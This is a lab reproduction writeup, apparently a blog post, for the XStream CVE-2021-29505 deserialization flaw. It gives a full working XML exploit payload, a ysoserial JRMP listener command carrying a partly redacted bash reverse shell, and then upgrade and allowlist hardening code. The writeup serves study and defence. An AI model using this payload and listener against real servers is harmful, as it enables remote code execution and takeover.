
XStream Remote Code Execution (CVE-2021-29505)
1. Description
XStream is an O/X mapping (object-to-XML) library for serializing Java objects to XML and back. Serializing a JavaBean or deserializing an XML document needs no helper classes or mapping files, which is what makes XML serialization with XStream so convenient, and also what makes it dangerous: the element names in the document decide which classes get instantiated. In CVE-2021-29505 a remote attacker who controls the processed input stream can replace or inject objects so that the target executes arbitrary code loaded from a remote host. The chain used in this writeup makes the vulnerable server open a JRMP (RMI) connection to an attacker-controlled listener; the listener's reply is read with ordinary Java serialization on the server, so the gadget the listener serves (ysoserial's CommonsCollections6 here) has to be available on the target's classpath.
2. Affected versions
XStream <= 1.4.16
3. Environment setup
The vulhub compose file:
https://raw.githubusercontent.com/vulhub/vulhub/master/xstream/CVE-2021-29505/docker-compose.yml
File: docker-compose.yml
    version: '2'
    services:
      web:
        image: vulhub/xstream:1.4.16
        ports:
          - "8080:8080"
Start it with:
    docker-compose up -d

The container is up (screenshot omitted):

Target URL (the Docker host, 192.168.0.106 in this writeup): http://192.168.0.106:8080/

4. Reproduction
Two machines are involved: the target at 192.168.0.106:8080 and the attacker's machine at 192.168.0.102, which runs the JRMP listener on port 1098. When the target unmarshals the PoC below, the custom deserialization of java.util.PriorityQueue sorts its two Rdn$RdnEntry elements; the comparison goes through XString.equals() into Packet.toString(), then through the SAAJ message objects into KeyStoreIterator, LazySearchEnumerationImpl and BindingEnumeration, which asks the RegistryImpl_Stub for a registry listing. That stub's UnicastRef points at 192.168.0.102:1098, so the server connects to the listener and deserializes whatever it answers with.
Start the listener on the attacker machine:
The reverse-shell command must be base64-encoded: Runtime.exec splits the command on spaces, and the {echo,...}|{base64,-d}|{bash,-i} form keeps the shell one-liner free of spaces and redirection characters. The encoded command is redacted below.
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1098 CommonsCollections6 "bash -c {echo,L2Jpbi9iYxxxxxxxxPiYx}|{base64,-d}|{bash,-i}"
Listener running (screenshot omitted):

Send the PoC (screenshot omitted):

Reverse shell received (screenshot omitted):

Full request. The listener address appears three times in the payload (the two strings inside RegistryImpl_Stub's RemoteObject block and the host/port pair in ctx); replace 192.168.0.102 and 1098 with your own listener. The Content-Length header is from the original single-line capture and changes if the XML is re-indented as below.
POST / HTTP/1.1
Host: 192.168.0.106:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Content-Length: 3115

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.org.apache.xpath.internal.objects.XString'>
        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
          <parsedMessage>true</parsedMessage>
          <soapVersion>SOAP_11</soapVersion>
          <bodyParts/>
          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
            <attachmentsInitialized>false</attachmentsInitialized>
            <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
              <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                  <names>
                    <string>aa</string>
                    <string>aa</string>
                  </names>
                  <ctx>
                    <environment/>
                    <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                      <java.rmi.server.RemoteObject>
                        <string>UnicastRef</string>
                        <string>192.168.0.102</string>
                        <int>1098</int>
                        <long>0</long>
                        <int>0</int>
                        <long>0</long>
                        <short>0</short>
                        <boolean>false</boolean>
                      </java.rmi.server.RemoteObject>
                    </registry>
                    <host>192.168.0.102</host>
                    <port>1098</port>
                  </ctx>
                </candidates>
              </aliases>
            </nullIter>
          </sm>
        </message>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>
5. Fix
Upgrade XStream to 1.4.17 or later by raising the dependency version in the Maven pom.xml. 1.4.17 only closes this particular chain: further chains against 1.4.17 were fixed in later releases, and 1.4.18 switched the default from a blacklist to an allowlist, so pin the current release rather than exactly 1.4.17, and configure XStream's security framework explicitly so that only the types your endpoint expects can be unmarshalled.
    <dependency>
      <groupId>com.thoughtworks.xstream</groupId>
      <artifactId>xstream</artifactId>
      <version>1.4.17</version>
    </dependency>
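The allowlist configuration the upgrade should be paired with, shown beside the vulnerable pattern. This is an added example, not code from the post or from the vulhub application; it assumes the xstream dependency is on the classpath, and the Order class, the element names and the sample documents are made up for the illustration.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.XStreamException;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

import java.util.List;

public class XStreamHardening {

    /** Hypothetical application type: the only object this endpoint is meant to accept. */
    public static class Order {
        String id;
        int quantity;
    }

    /**
     * Vulnerable pattern, as CVE-2021-29505 needs it: a default XStream 1.4.16 instance
     * maps element names straight to classes, so the XML decides what gets instantiated,
     * and the release's blacklist does not cover the PoC's gadget classes.
     */
    static Object parseUnsafe(String xml) {
        return new XStream().fromXML(xml);
    }

    /** Hardened: deny every type first, then opt in only what this endpoint needs. */
    static XStream hardenedXStream() {
        XStream xstream = new XStream();
        xstream.addPermission(NoTypePermission.NONE);               // clears all permissions: nothing is allowed
        xstream.addPermission(NullPermission.NULL);                 // explicit nulls
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);  // int, boolean, ...
        xstream.allowTypes(new Class[] { String.class, Order.class });
        xstream.alias("order", Order.class);
        return xstream;
    }

    static Object parseSafe(String xml) {
        return hardenedXStream().fromXML(xml);
    }

    public static void main(String[] args) {
        // Constructed sample input for the hypothetical endpoint.
        String benign = "<order><id>A-1</id><quantity>3</quantity></order>";
        Order order = (Order) parseSafe(benign);
        System.out.println("hardened parser accepted order " + order.id + " x" + order.quantity);

        // A document naming a JDK class the endpoint never declared. The default instance
        // builds it without complaint; the CVE payload uses exactly this mechanism with
        // PriorityQueue, Rdn$RdnEntry, RegistryImpl_Stub and the rest of the chain.
        String unexpected = "<java.util.ArrayList><string>anything</string></java.util.ArrayList>";
        List<?> list = (List<?>) parseUnsafe(unexpected);
        System.out.println("default parser built a " + list.getClass().getName());

        try {
            parseSafe(unexpected);
            System.out.println("UNEXPECTED: hardened parser accepted a foreign type");
        } catch (ForbiddenClassException e) {
            // Thrown when the root element names a type outside the allowlist.
            System.out.println("hardened parser rejected: " + e.getMessage());
        } catch (XStreamException e) {
            // For nested elements the same refusal can surface wrapped in a ConversionException.
            System.out.println("hardened parser rejected (wrapped): " + e.getMessage());
        }
    }
}
```

Treat the rejection as a hard failure (return 400, log the class name) rather than falling back to a permissive parser, and keep the allowed set to concrete application classes; allowTypesByWildcard with a broad pattern such as "java.**" would re-admit most of the JDK gadgets the PoC relies on.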
Disclaimer: the tools and procedures provided here may be offensive in nature and are intended solely for security research and teaching; use them at your own risk.
If this article infringes on your rights or affects your company's business, contact the author for removal.
Reprint notice: copyright remains with the author. Commercial reproduction requires the author's permission; non-commercial reproduction must credit the source.
Author: thelostworld


